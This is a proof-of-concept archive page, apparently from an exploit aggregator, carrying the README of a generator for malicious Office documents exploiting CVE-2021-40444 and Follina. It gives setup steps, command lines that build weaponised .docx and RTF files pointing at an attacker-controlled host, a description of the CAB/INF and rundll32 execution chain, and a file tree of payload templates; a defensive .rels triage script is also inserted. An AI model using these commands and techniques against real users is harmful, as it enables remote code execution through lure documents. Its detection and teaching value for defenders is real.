Related vulnerability
Title: Microsoft MSHTML.DLL path traversal vulnerability (CVE-2021-40444)
Description: Microsoft MSHTML.DLL is a dynamic link library from Microsoft (USA) used to parse HTML; applications such as IE, Outlook and Outlook Express use it. Microsoft MSHTML.DLL has a path traversal vulnerability: a remote attacker can craft an Office document carrying a malicious ActiveX control, lure the victim into opening it, and execute arbitrary code on the system.
Introduction
# Exploiting Follina CVE and CVE-2021-40444 Vulnerabilities
## Table of Contents
1. [Introduction](#introduction)
2. [Prerequisites](#prerequisites)
3. [Setup and Installation](#setup-and-installation)
4. [Usage](#usage)
5. [Detailed Explanation](#detailed-explanation)
6. [Commands](#commands)
7. [Disclaimer](#disclaimer)
## Introduction
This repository contains scripts and resources for exploiting the Follina CVE and CVE-2021-40444 vulnerabilities in Microsoft Office. The scripts generate malicious document files that can execute arbitrary code on the target system.
## Prerequisites
- Flare VM
- Python 3.x
- Microsoft Word
- Required Python packages (listed in `requirements.txt`)
## Setup and Installation
1. **Flare VM Setup:**
   - Ensure you have Flare VM installed. The credentials for the VM are:
     - Username: `lab`
     - Password: `password`
2. **Python and Virtual Environment:**
   ```bash
   git clone https://github.com/basim-ahmad/Follina-CVE-and-CVE-2021-40444
   # the scripts live in the CVE-2021-40444 subdirectory of the cloned repository
   cd Follina-CVE-and-CVE-2021-40444/CVE-2021-40444
   ```
   - Make sure Python and pip are installed in the virtual machine.
   - Install the `virtualenv` package using the following command:
     ```bash
     pip install virtualenv
     ```
   - Create a virtual environment named `venv`:
     ```bash
     python -m virtualenv venv
     ```
   - Activate the virtual environment:
     ```bash
     venv\Scripts\activate.bat
     ```
   - Install the required packages:
     ```bash
     pip install -r requirements.txt
     ```
## Usage
1. **Generating the Exploit:**
   - Navigate to the project directory and run the following command to generate the exploit:
     ```bash
     python generator.py -u http://192.168.197.132 -P test\calc.dll --host
     ```
     Replace `192.168.197.132` with your IP address.
2. **Accessing the Generated Document:**
   - The generated `.docx` file will be located in the directory:
     ```
     C:\Users\Lab\Desktop\project\CVE-2021-40444\out\document.docx
     ```
## Detailed Explanation
### Chain Exploitation
- The document (`.docx`) is opened.
- The document contains a relationship pointing to malicious HTML stored in `document.xml.rels`.
- The HTML link opens in IE preview.
- An object element points to a CAB file and an iframe points to an INF file; both are embedded in JScript and prefixed with the `.cpl:` directive.
- The CAB file is opened, dropping the INF file into the `%TEMP%\Low` directory.
- The INF file is opened via the `.cpl:` directive, causing `rundll32` to side-load it.
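The first two links of this chain (an external relationship in `document.xml.rels` pointing at remote HTML) leave a static trace in the `.docx` itself. The following triage script is an added example for defenders, not code from this repository: it walks every `.rels` part in a document and reports external relationships whose target is a remote or `mhtml:` URL. `build_sample_docx` constructs a minimal stand-in document for testing; it is not a real Office file and the `placeholder.invalid` URL is a constructed value.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
OOXML_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
# Schemes that indicate a relationship resolves outside the package (assumption: the
# traits relevant to this chain, where an oleObject relationship fetches remote HTML).
REMOTE_SCHEMES = ("http://", "https://", "mhtml:")


def suspicious_relationships(docx_bytes: bytes) -> list:
    """Return every External relationship in any .rels part that targets a remote URL."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(REL_NS + "Relationship"):
                target = rel.get("Target", "")
                external = rel.get("TargetMode", "Internal") == "External"
                if external and target.lower().startswith(REMOTE_SCHEMES):
                    findings.append({
                        "part": name,
                        "id": rel.get("Id"),
                        "type": rel.get("Type", "").rsplit("/", 1)[-1],
                        "target": target,
                    })
    return findings


def build_sample_docx(target: str) -> bytes:
    """Constructed minimal package (not a valid Word document) with one external relationship."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        f'<Relationship Id="rId1" Type="{OOXML_REL}styles" Target="styles.xml"/>'
        f'<Relationship Id="rId2" Type="{OOXML_REL}oleObject" Target="{target}" TargetMode="External"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_docx("mhtml:http://placeholder.invalid/page.html")
    for hit in suspicious_relationships(sample):
        print(f"{hit['part']}: {hit['id']} ({hit['type']}) -> {hit['target']}")
```

Run it against a real `.docx` by passing the file's bytes to `suspicious_relationships`; a hit of type `oleObject` with a remote target is the shape this chain produces and is worth detonating in a sandbox rather than opening.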
### Scripts Overview
#### `generator.py`
- Implements an exploit for CVE-2021-40444, allowing remote code execution via Microsoft Office.
- Contains various helper functions for patching CAB files, creating RAR files, generating payloads, and more.
#### `cab_parser.py`
- A tool for viewing CAB file headers.
- Defines classes and methods for handling and parsing CAB files.
### Section 2.0: Setup in Flare VM
- Install necessary tools and packages.
- Create and activate a virtual environment.
- Install Python packages from `requirements.txt`.
## Commands
- Generate the original exploit and test locally:
  ```bash
  python generator.py -u http://127.0.0.1 -P test\calc.dll --host
  ```
- Generate CABless exploit leveraging MS-MSDT (Follina attack), in both DOCX and RTF docs:
  ```bash
  python generator.py -u http://127.0.0.1 -P test\calc.ps1 --no-cab --host --convert
  ```
- Generate CABless exploit (IE-only) with HTML smuggling and test locally via IE:
  ```bash
  python generator.py -u http://127.0.0.1 -P test\calc.js --no-cab --host -t
  ```
- Generate CABless exploit with RAR and test locally via IE:
  ```bash
  python generator.py -u http://127.0.0.1 -P test\job-jscript.wsf --no-cab --host -t
  ```
## Disclaimer
This project is for educational purposes only. Use it responsibly and do not exploit vulnerabilities on systems you do not have permission to test. Misuse of this information can lead to criminal charges.
File snapshot
[4.0K] /data/pocs/84bef9e0bab6fc2334fd0fd75f713a8c8ba24580
├── [4.0K] CVE-2021-40444
│ ├── [4.0K] bin
│ │ ├── [619K] Rar.exe
│ │ ├── [485K] RarExt32.dll
│ │ └── [558K] RarExt.dll
│ ├── [6.8K] cab_parser.py
│ ├── [ 155] clean.bat
│ ├── [4.0K] data
│ │ └── [4.0K] word_dat
│ │ ├── [1.4K] [Content_Types].xml
│ │ ├── [4.0K] docProps
│ │ │ ├── [ 733] app.xml
│ │ │ └── [ 745] core.xml
│ │ ├── [4.0K] _rels
│ │ └── [4.0K] word
│ │ ├── [ 14K] document.xml
│ │ ├── [2.3K] fontTable.xml
│ │ ├── [4.0K] _rels
│ │ │ └── [1.2K] document.xml.rels
│ │ ├── [2.6K] settings.xml
│ │ ├── [ 32K] styles.xml
│ │ ├── [4.0K] theme
│ │ │ └── [6.9K] theme1.xml
│ │ └── [ 603] webSettings.xml
│ ├── [ 17K] generator.py
│ ├── [4.0K] out
│ │ ├── [ 12K] document.docx
│ │ └── [ 0] hello.docx
│ ├── [4.0K] __pycache__
│ │ └── [ 16K] cab_parser.cpython-311.pyc
│ ├── [ 25] requirements.txt
│ ├── [ 927] setup.inf
│ ├── [ 275] setup.rpt
│ ├── [4.0K] srv
│ │ ├── [ 0] 21WBQ6UPOZT9.html
│ │ ├── [ 0] DU92IN37GTLF.html
│ │ ├── [ 0] DV0WJATZJEN0.html
│ │ ├── [ 11K] index.html
│ │ ├── [5.1K] J0803VTK5W9N.html
│ │ ├── [ 403] mswordcab.ddf
│ │ ├── [ 0] QRN6Q3438F8Q.html
│ │ ├── [5.1K] R7GGVKCTDG7X.html
│ │ └── [ 0] WR0KINF7X8YR.html
│ ├── [4.0K] template
│ │ ├── [5.1K] cabless-msdt-sample2.html
│ │ ├── [5.1K] cabless-rar-sample1.html
│ │ ├── [6.2K] cabless-smuggling-sample1.html
│ │ ├── [4.5K] cab-orig-debobfuscated1.html
│ │ ├── [5.9K] cab-orig-debobfuscated2.html
│ │ ├── [5.3K] cab-orig-j00sean.html
│ │ ├── [6.2K] cab-orig-obfuscated.html
│ │ ├── [4.9K] cab-uri-debobfuscated1.html
│ │ ├── [6.5K] cab-uri-debobfuscated2.html
│ │ ├── [6.3K] cab-uri-obfuscated.html
│ │ ├── [5.4K] cab-uri-sample1.html
│ │ ├── [6.2K] cab-uri-test-obfuscated.html
│ │ └── [ 11K] index.html
│ ├── [4.0K] test
│ │ ├── [ 81K] calc.dll
│ │ ├── [ 200] calc.hta
│ │ ├── [ 101] calc.js
│ │ ├── [ 24] calc.ps1
│ │ ├── [ 143] calc.vbs
│ │ ├── [ 112] job-jscript.wsf
│ │ └── [ 112] job-vbs.wsf
│ └── [4.0K] util
│ └── [1.6K] server.py
├── [1.0K] LICENSE
└── [3.8K] README.md
15 directories, 54 files
Notes
1. Prefer accessing the original source.
2. If the source is no longer available or cannot be reached, e-mail f.jinxu#gmail.com (replace # with @) to request a local snapshot.
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for or donating towards the local POC. Thank you for your support.